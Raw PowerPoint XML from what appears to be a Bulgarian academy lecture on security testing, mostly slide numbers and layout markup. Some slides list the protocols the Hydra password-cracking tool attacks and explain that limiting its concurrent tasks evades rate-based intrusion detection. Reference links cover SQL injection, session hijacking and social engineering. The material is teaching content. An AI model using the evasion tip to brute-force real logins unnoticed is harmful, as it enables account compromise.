        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1849349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50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3197135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51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4172558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52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2101289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http://www.scribd.com/doc/54228526/7/Password-Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="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53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1863447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54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1915411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55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1774896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56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3927531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Advanced Software Testing Vol. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>1</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2285721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57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2175515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58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1851359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this tool supports: AFP, Cisco AAA, Cisco </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Rexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Rlogin, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Rsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, SAP/R3, SIP, SMB, SMTP, SMTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Enum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, SNMP, SOCKS5, SSH (v1 and v2), Subversion, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Teamspeak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (TS2), Telnet, VMware-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, VNC and XMPP. For HTTP, POP3, IMAP and SMTP, several login mechanisms like plain and MD5 digest etc. are supported.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6FB4F6EA-423E-42DF-9292-215E7D886C4E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3540523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IPS   (Intrusion   Prevention System)   is   a   must   have   in   a corporate   network,   nowadays such kind of device always come with   predefined   signatures   to detect password cracking attacks. However, they have a weak point, they are based on a defined rate. For   example   if   there   are   10 authentication failed in 5 seconds from   the   same   source   IP   just block  or  quarantine the  attacker for x seconds. For   this   purpose   Hydra   comes with  some features to  plan  how the   attack   is   conducted.   The   ­t option   can   be   used   to   set   the number   of   concurrent   tasks (default is 16). Setting it to 1 and you will  stay  under the  radar  of any IDS.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6FB4F6EA-423E-42DF-9292-215E7D886C4E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2971510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61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4012176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62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2853465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63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2991992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64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2273109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65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3086721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66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2130616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Advanced Software Testing Vol. 1</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="bg-BG"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70636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67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="967801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http://en.kioskea.net/contents/attaques/manipulation-url.php3</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68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1665160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69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3024922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70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24743545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71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1356294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https://prakharprasad.com/introduction-to-sql-injection-and-exploitation-mysql-5-error-based/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{88DCE282-E14E-4978-B1B5-29107FE57A08}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8192280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smtClean="0"/>
              <a:t>blackhat.com/presentations/bh-usa-06/BH-US-06-Gallagher.pdf</a:t>
            </a:r>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73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37942305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74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3933108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DCE282-E14E-4978-B1B5-29107FE57A08}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3134390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76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="241677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Advanced Software Testing Vol. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>1</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1935155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77</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27169692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a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.slideshare.net/amansyal/session-hijacking-by-rahul-tyagi</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78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3292486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13787866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80</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="412079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81</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8684162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82</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2221803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83</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25700232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http://www.slideshare.net/washal/social-engineeringcase-study</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://en.wikipedia.org/wiki/Social_engineering_(security)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>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84</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4283169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85</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37010337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86</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="402462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DCE282-E14E-4978-B1B5-29107FE57A08}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1843408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87</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2519270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88</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7876302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89</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28909964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90</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38360332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91</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35258941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92</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31433725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93</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="582940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Security Testing Is Hard,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> Martin R. Stytz, James A. Whittaker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109673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a:solidFill>
                  <a:srgbClr val="0EFE58"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Company Name</a:t>
            </a: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rPr>
              <a:t>Company Web Site</a:t>
            </a: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Position</a:t>
            </a:r>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a:t>Insert a Picture Here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20041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a:t>Slide Title</a:t>
            </a:r>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210161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a:t>Slide Title</a:t>
            </a:r>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a:t>Enter source code here</a:t>
            </a:r>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119194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Section Title</a:t>
            </a:r>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Section Subtitle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20398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форум програмиране, форум уеб дизайн</a:t>
              </a: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a:ln w="0">
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Corbel" pitchFamily="34" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>курсове и уроци по програмиране, уеб дизайн – безплатно</a:t>
              </a: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програмиране за деца – безплатни курсове и уроци</a:t>
              </a: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a:ln w="0">
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:effectLst/>
                </a:rPr>
                <a:t>безплатен SEO курс - оптимизация за търсачки</a:t>
              </a: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уроци по уеб дизайн, HTML, CSS, JavaScript, Photoshop</a:t>
              </a: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a:ln w="0">
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Corbel" pitchFamily="34" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>уроци по програмиране и уеб дизайн за ученици</a:t>
              </a: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ASP.NET MVC курс – HTML, SQL, C#, .NET, ASP.NET MVC</a:t>
              </a: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безплатен курс "Разработка на софтуер в cloud среда"</a:t>
              </a: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BG Coder - онлайн състезателна система - online judge</a:t>
              </a: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курсове и уроци по програмиране, книги – безплатно от Наков</a:t>
              </a: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безплатен курс "Качествен програмен код"</a:t>
              </a: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алго академия – състезателно програмиране, състезания</a:t>
              </a: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ASP.NET курс - уеб програмиране, бази данни, C#, .NET, ASP.NET</a:t>
              </a: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a:ln w="0">
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:effectLst/>
                </a:rPr>
                <a:t>курсове и уроци по </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="bg-BG" sz="200" kern="1200" noProof="1">
                  <a:ln w="0">
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Corbel" pitchFamily="34" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>програмиране – Телерик академия</a:t>
              </a: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a:ln w="0">
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:effectLst/>
                </a:rPr>
                <a:t>курс мобилни приложения с iPhone, Android, WP7, PhoneGap</a:t>
              </a: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a:ln w="0">
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Corbel" pitchFamily="34" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>free C# book, безплатна книга C#, книга Java, книга C#</a:t>
              </a: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a:ln w="0">
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Дончо Минков - сайт за програмиране</a:t>
              </a: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a:ln w="0">
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Corbel" pitchFamily="34" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>Николай Костов - блог за програмиране</a:t>
              </a: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a:ln w="0">
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>C# курс, програмиране, безплатно</a:t>
              </a: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a:t>Presentation Title</a:t>
            </a:r>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a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:reflection blurRad="6350" stA="55000" endA="300" endPos="45500" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
                </a:effectLst>
              </a:rPr>
              <a:t>?</a:t>
            </a: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a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:reflection blurRad="6350" stA="55000" endA="300" endPos="45500" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
                </a:effectLst>
              </a:rPr>
              <a:t>?</a:t>
            </a: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rgbClr val="FF831D"/>
                </a:solidFill>
                <a:effectLst>
                  <a:reflection blurRad="6350" stA="55000" endA="300" endPos="45500" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
                </a:effectLst>
              </a:rPr>
              <a:t>?</a:t>
            </a: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a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:reflection blurRad="6350" stA="55000" endA="300" endPos="45500" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
                </a:effectLst>
              </a:rPr>
              <a:t>?</a:t>
            </a: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a:solidFill>
                  <a:srgbClr val="FF4A37"/>
                </a:solidFill>
                <a:effectLst>
                  <a:reflection blurRad="6350" stA="60000" endA="900" endPos="60000" dist="29997" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
                </a:effectLst>
              </a:rPr>
              <a:t>?</a:t>
            </a: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a:solidFill>
                  <a:srgbClr val="9966FF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:reflection blurRad="6350" stA="55000" endA="300" endPos="45500" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
                </a:effectLst>
              </a:rPr>
              <a:t>?</a:t>
            </a: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a:solidFill>
                  <a:srgbClr val="FF6699"/>
                </a:solidFill>
                <a:effectLst>
                  <a:reflection blurRad="6350" stA="55000" endA="300" endPos="45500" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
                </a:effectLst>
              </a:rPr>
              <a:t>?</a:t>
            </a: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a:solidFill>
                  <a:schemeClr val="accent4">
